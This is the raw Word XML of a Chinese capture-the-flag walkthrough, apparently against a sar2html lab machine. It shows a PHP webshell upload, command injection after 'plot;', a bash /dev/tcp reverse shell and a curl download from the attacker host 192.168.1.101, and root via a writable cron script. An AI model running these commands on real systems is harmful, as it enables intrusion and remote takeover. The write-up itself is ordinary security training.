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13B9C" w14:textId="7D84AE9B" w:rsidR="00B57387" w:rsidRDefault="00F75670" w:rsidP="00F75670">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C349B94" w14:textId="185523F4" w:rsidR="00F75670" w:rsidRDefault="00250792" w:rsidP="00F75670">
      <w:r w:rsidRPr="00250792">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1550F3C7" wp14:editId="55A7F207">
            <wp:extent cx="5274310" cy="2894330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1981757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570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5F0A" w14:textId="7BF7880C" w:rsidR="00250792" w:rsidRDefault="00250792" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现只开放了8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，看看目录扫描能不能有结果</w:t>
      </w:r>
      <w:r w:rsidR="00FF5FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并没有爆破出任何信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA94AF" w14:textId="6AD2DD07" w:rsidR="00FF5FD4" w:rsidRDefault="00FF5FD4" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用nikto扫描一下看看有什么结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDFA50" w14:textId="5610010A" w:rsidR="00C60900" w:rsidRDefault="00EB1CA1" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫到有</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB1CA1">
        <w:t>/phpinfo.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，看一下有什么信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C592158" w14:textId="30241B66" w:rsidR="00DB4587" w:rsidRDefault="006B62F3" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含和文件读取都是打开的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBA2617" w14:textId="1FE48FC3" w:rsidR="001561E6" w:rsidRDefault="001561E6" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看路径有没有可能含有robots.</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4312C" w14:textId="52536CE8" w:rsidR="001561E6" w:rsidRDefault="001561E6" w:rsidP="00F75670">
      <w:r w:rsidRPr="001561E6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6585E98E" wp14:editId="6E2B292B">
            <wp:extent cx="5274310" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1978909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094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F906" w14:textId="04E97627" w:rsidR="001561E6" w:rsidRDefault="001561E6" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>含有这个信息，robots</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下应该是路径信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D973D7" w14:textId="20D9D65A" w:rsidR="00C736C3" w:rsidRDefault="00C736C3" w:rsidP="00C736C3">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>EB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24949342" w14:textId="7E3C5982" w:rsidR="00C736C3" w:rsidRDefault="00C736C3" w:rsidP="00F75670">
      <w:r w:rsidRPr="00C736C3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C42DCCA" wp14:editId="2D6DF447">
            <wp:extent cx="5274310" cy="2964815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="674664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643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64DA" w14:textId="6788A3DF" w:rsidR="00A70DA2" w:rsidRDefault="00A70DA2" w:rsidP="00F75670">
      <w:r w:rsidRPr="00A70DA2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0003970E" wp14:editId="24C69CED">
            <wp:extent cx="4362450" cy="3867150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58065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51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BE4A" w14:textId="3C34BA01" w:rsidR="00A70DA2" w:rsidRDefault="00A70DA2" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现文件上传，上传了一个包含有p</w:t>
      </w:r>
      <w:r>
        <w:t>hp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话木马的php文件，成功了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55044C62" w14:textId="66489136" w:rsidR="00A70DA2" w:rsidRDefault="00A70DA2" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是不知到路径在哪里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B5FE7" w14:textId="0BF925C7" w:rsidR="00A70DA2" w:rsidRDefault="00043ED2" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现页面名称为s</w:t>
      </w:r>
      <w:r>
        <w:t>ar2html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，信息收集看看有没有什么收获</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E4322" w14:textId="74FCA74B" w:rsidR="00280B87" w:rsidRDefault="00710758" w:rsidP="00F75670">
      <w:r w:rsidRPr="00710758">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BAAE527" wp14:editId="69E9A5A0">
            <wp:extent cx="5274310" cy="1256665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1395884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84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D17A" w14:textId="0FE63343" w:rsidR="00710758" w:rsidRDefault="00710758" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个有命令执行，下载下来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D109D" w14:textId="63EFADE4" w:rsidR="00710758" w:rsidRDefault="00710758" w:rsidP="00F75670">
      <w:r w:rsidRPr="00710758">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CEEDFB0" wp14:editId="6EA71506">
            <wp:extent cx="5274310" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="756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09C3" w14:textId="6178215F" w:rsidR="00710758" w:rsidRDefault="00710758" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="008D381B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在plot</w:t>
      </w:r>
      <w:r w:rsidR="008D381B">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="008D381B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的命令都可以执行</w:t>
      </w:r>
      <w:r w:rsidR="00004861">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，且有回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCD929" w14:textId="5B077149" w:rsidR="00004861" w:rsidRDefault="006B6866" w:rsidP="00F75670">
      <w:r w:rsidRPr="006B6866">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4791DDCD" wp14:editId="2F937E8B">
            <wp:extent cx="5274310" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="834287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87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5D84" w14:textId="633C8A84" w:rsidR="006B6866" w:rsidRDefault="006B6866" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现命令成功执行，尝试执行反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2F2AE" w14:textId="67D8393E" w:rsidR="00027C3E" w:rsidRDefault="00027C3E" w:rsidP="00F75670">
      <w:r w:rsidRPr="00027C3E">
        <w:t>bash -i 2&gt;&amp;1 &gt;/dev/tcp/192.168.1.101/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7100AC4B" w14:textId="28BE313F" w:rsidR="00027C3E" w:rsidRDefault="00027C3E" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并无任何结果，页面好像禁止了&amp;，url编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965EE99" w14:textId="20483E6F" w:rsidR="006A3BEC" w:rsidRDefault="006A3BEC" w:rsidP="00F75670">
      <w:r w:rsidRPr="006A3BEC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E8FF7C0" wp14:editId="25B008B3">
            <wp:extent cx="5274310" cy="1651635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1321070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703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08E0" w14:textId="0FFBEFD5" w:rsidR="006A3BEC" w:rsidRDefault="006A3BEC" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错显示不存在</w:t>
      </w:r>
      <w:r>
        <w:t>…..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C3F01" w14:textId="3DCB3CC9" w:rsidR="00E3602A" w:rsidRDefault="00E3602A" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地编写脚本，下载尝试执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53483F" w14:textId="24EFD048" w:rsidR="00840FC0" w:rsidRDefault="00840FC0" w:rsidP="00F75670">
      <w:r>
        <w:t xml:space="preserve">Curl -o a.sh </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00A809D8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.1.101/a.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">   chmod 777 a.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD63D5A" w14:textId="508D6BFD" w:rsidR="00840FC0" w:rsidRDefault="00840FC0" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行页面有反应，但是本地监听并没有反应，看看目标sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036EBC16" w14:textId="05573BD2" w:rsidR="00840FC0" w:rsidRDefault="00840FC0" w:rsidP="00F75670">
      <w:r w:rsidRPr="00840FC0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E9E96DD" wp14:editId="250EA99A">
            <wp:extent cx="4991100" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1759167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671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D6A0" w14:textId="3AF0888D" w:rsidR="00840FC0" w:rsidRDefault="00840FC0" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接了dash，dash好像并不支持这种语法,指定/</w:t>
      </w:r>
      <w:r>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFEAC4" w14:textId="77777777" w:rsidR="00E152CC" w:rsidRDefault="00E152CC" w:rsidP="00F75670"/>
    <w:p w14:paraId="236B38B4" w14:textId="65EF493B" w:rsidR="00E152CC" w:rsidRDefault="00E152CC" w:rsidP="00F75670">
      <w:r w:rsidRPr="00E152CC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27D94B1B" wp14:editId="3BE9A86D">
            <wp:extent cx="5274310" cy="4235450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1956601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01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2BA8" w14:textId="77777777" w:rsidR="00E152CC" w:rsidRDefault="00E152CC" w:rsidP="00F75670"/>
    <w:p w14:paraId="2F08E006" w14:textId="61CC32C0" w:rsidR="00E152CC" w:rsidRDefault="00E152CC" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时执行了一个以root权限的任务，执行了.</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>finally.sh，但是没有写入权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A716476" w14:textId="06D72B88" w:rsidR="00336029" w:rsidRDefault="00336029" w:rsidP="00F75670">
      <w:r w:rsidRPr="00336029">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07ADBE87" wp14:editId="2F72E469">
            <wp:extent cx="4495800" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1661648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483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CBCE" w14:textId="52F055AA" w:rsidR="00336029" w:rsidRDefault="00336029" w:rsidP="00F75670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是write有写入权限，发现里面指定了s</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行，将其覆盖并写入反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967BE22" w14:textId="60069927" w:rsidR="009B38BC" w:rsidRDefault="009B38BC" w:rsidP="00F75670">
      <w:r w:rsidRPr="009B38BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="782E498D" wp14:editId="4F4AAFE0">
            <wp:extent cx="5274310" cy="1786890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1870242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424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40CB" w14:textId="77777777" w:rsidR="001A48ED" w:rsidRDefault="001A48ED" w:rsidP="00F75670"/>
    <w:p w14:paraId="4D4F0C4D" w14:textId="039A1A1E" w:rsidR="001A48ED" w:rsidRDefault="001B4CD6" w:rsidP="00F75670">
      <w:r w:rsidRPr="001B4CD6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49E893D1" wp14:editId="148B349A">
            <wp:extent cx="5274310" cy="2894330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1027268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68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9D5F" w14:textId="0E16899A" w:rsidR="001B4CD6" w:rsidRPr="00F75670" w:rsidRDefault="001B4CD6" w:rsidP="00F75670">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿到flag</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B4CD6" w:rsidRPr="00F756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FF7"/>
    <w:rsid w:val="00004861"/>
    <w:rsid w:val="00027C3E"/>
    <w:rsid w:val="00043ED2"/>
    <w:rsid w:val="001561E6"/>
    <w:rsid w:val="001A48ED"/>
    <w:rsid w:val="001B4CD6"/>
    <w:rsid w:val="00250792"/>
    <w:rsid w:val="00280B87"/>
    <w:rsid w:val="00336029"/>
    <w:rsid w:val="006A3BEC"/>
    <w:rsid w:val="006B62F3"/>
    <w:rsid w:val="006B6866"/>
    <w:rsid w:val="00710758"/>
    <w:rsid w:val="00780FF7"/>
    <w:rsid w:val="00840FC0"/>
    <w:rsid w:val="008D381B"/>
    <w:rsid w:val="009B38BC"/>
    <w:rsid w:val="00A70DA2"/>
    <w:rsid w:val="00B57387"/>
    <w:rsid w:val="00C60900"/>
    <w:rsid w:val="00C736C3"/>
    <w:rsid w:val="00DB4587"/>
    <w:rsid w:val="00E152CC"/>
    <w:rsid w:val="00E3602A"/>
    <w:rsid w:val="00EB1CA1"/>
    <w:rsid w:val="00F75670"/>
    <w:rsid w:val="00FF5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98C29"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{27D6A5AD-C8E8-4C05-8608-4E44A0AB3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756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75670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40FC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40F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192.168.1.101/a.sh" TargetMode="External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 D</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>io D</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-22T10:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-22T11:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>